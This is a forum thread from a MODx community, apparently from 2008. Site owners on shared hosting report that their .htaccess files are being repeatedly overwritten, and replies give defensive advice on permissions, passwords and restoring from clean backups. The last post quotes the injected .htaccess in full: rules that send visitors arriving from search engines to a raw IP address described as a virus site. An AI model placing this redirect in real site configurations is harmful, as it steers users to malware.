[Fixed] .HTACCESS file integrity compromised. Content wiped and replaced

Hi guys,

I’m not sure if this issue has been reported yet. Every other day when a user tries to surf our site, the only page available to them is the home page. When they try to follow a link from the home page to another page or even access it directly; they get the default ’’page unavailable’’ document.

Initially I had to reinstall MODx to fix the issue, but that’s just not an effective way of solving the problem.

I found out later that the issue was related to the .htaccess file. Apparently everything in the file was removed and replaced with what seems to be some search engine Rewrites



This doesn’t seem right and I’m affraid we might victim to an attack.

We’re running MODx 0.9.6.2 with Register_globals off on the .ini file and Validate HTTP_REFERER set to ON.
Does anyone know anything about this?

Thanks a lot for any help

Is / was your .htaccess file set to CHMOD 0755 or 0777? It should be 0644.

Is your site on a shared hosting account?

Also, remove the Reflect snippet from the server: http://www.itconsmedia.net/assets/snippets/reflect/
And make sure the directory listing is deactivated by Apache.

I’m impressed,

How did you find out so fast that I’m with itCons Media. I guess the profile speaks it loud.
But let me try those steps, bare with me please

Quote from: treigh at Dec 09, 2008, 06:16 PM

I’m impressed,

How did you find out so fast that I’m with itCons Media. I guess the profile speaks it loud.
But let me try those steps, bare with me please

The domain I’m having issues with is on a shared hosting account. Is that a problem?

The first thing you should do is change the password for your hosting account itself. It’s quite possible (and likely) that someone is accessing your files (including .htaccess) directly through the hosting account, not modx.

Right on!

I just spoke with the hosting company and it seems many other users are having the same problem. They’re saying that it’s caused by a spyware software (Antivirus 2009) that would be running on the user’s machine and would be searching for FTP account access. But I don’t buy that at all because I don’t see how all these users would be having the exact same problem at the same time and they seem to have the fix as soon as you inquire about it. I Suspect they’ve been hacked at the server level and they don’t know how to explain it to the users.

Nonetheless I did a few changes to the FTP security and I’m glad that MODx had apparently nothing to do with it.
I hope that at least this post raised everyone’s vigilance to a higher level like it should. Even when you’re tired, check your site to make sure it’s running like should be.

Thanks folks

I have also encountered the problem, my .Htaccess set to 644, still being revised
I changed to 444 now. Hope that will not be revised once again

Thank you for sharing.
I think this is ixwebhositng server security problems,
a large number of my friends who use Ixwebhositng have appeared in this issue.

My website is http://laptopsbattery.us, when somebody click my site from google or yahoo,the page will be rewrie to http:// 89.28.13.205/ this site is a virus site
I hate hacker

Quote from: Seanax at Dec 10, 2008, 03:13 AM

I have also encountered the problem, my .Htaccess set to 644, still being revised
I changed to 444 now. Hope that will not be revised once again

If the server has been hacked, then changing file permissions probably won’t help. If a hacker has shell or FTP access via an account that can access your files, then they essentially have the same access level as you do. And if they had access previously, they may have left back door scripts hidden amongst your files that they could use to gain access again if the original way that they entered were blocked.

In this situation, I would delete all of the files in my account (or ask the host to create a new account for me) and reupload all of your files from a clean local backup. Before you do that, you should change all of your passwords (FTP, Control Panel, MySQL, MODx, etc.). That’s the only way to be sure that your website’s files are not infected with hacker code.

It’s certainly possible that the host has been rooted, in which case the only immediate solution is to change hosts. It’s also not that far-fetched that a virus or trojan program was used to steal login credentials, since that actually happens a lot. So make sure that all of the computers that have your login info on them are virus-free as well.

i have the same problem.
my own .htaccess file has been changed to:
======================================
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.205/in.html?s=xx [R,L]
======================================

Then i upload my backup .htaccess file to cover the changed .htaccess.
But two or three days later, the .htaccess will be changed again.
I don’t know how to avoid the changes, any help?